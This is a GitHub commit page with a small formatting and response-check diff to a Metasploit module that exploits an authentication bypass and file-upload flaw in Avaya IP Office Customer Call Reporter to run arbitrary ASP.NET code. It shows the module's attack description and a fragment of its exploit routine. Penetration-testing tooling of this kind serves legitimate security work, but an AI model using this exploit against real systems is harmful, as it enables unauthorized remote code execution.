Skip to content

Commit abb4bdd

Browse files
committed
metadata formatting, and a little res gotcha
1 parent cdf8956 commit abb4bdd

File tree

1 file changed

+7
-6
lines changed

1 file changed

+7
-6
lines changed

modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb

Lines changed: 7 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -16,18 +16,19 @@ class Metasploit3 < Msf::Exploit::Remote
1616

1717
def initialize
1818
super(
19-
'Name' => 'Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution',
19+
'Name' => 'Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution',
2020
'Description' => %q{
2121
This module exploits an authentication bypass vulnerability on Avaya IP Office
2222
Customer Call Reporter, which allows a remote user to upload arbitrary files
2323
through the ImageUpload.ashx component. It can be abused to upload and execute
2424
arbitrary ASP .NET code. The vulnerability has been tested successfully on Avaya IP
2525
Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2.
2626
},
27-
'Author' => [
28-
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
29-
'juan vazquez' # Metasploit module
30-
],
27+
'Author' =>
28+
[
29+
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
30+
'juan vazquez' # Metasploit module
31+
],
3132
'Platform' => 'win',
3233
'References' =>
3334
[
@@ -173,7 +174,7 @@ def exploit
173174
'method' => 'GET'
174175
}, 20)
175176

176-
if (!res or res.code != 200)
177+
if (!res or (res and res.code != 200))
177178
print_error("#{@peer} - Execution failed on #{payload_url} [No Response]")
178179
return
179180
end

0 commit comments

Comments
 (0)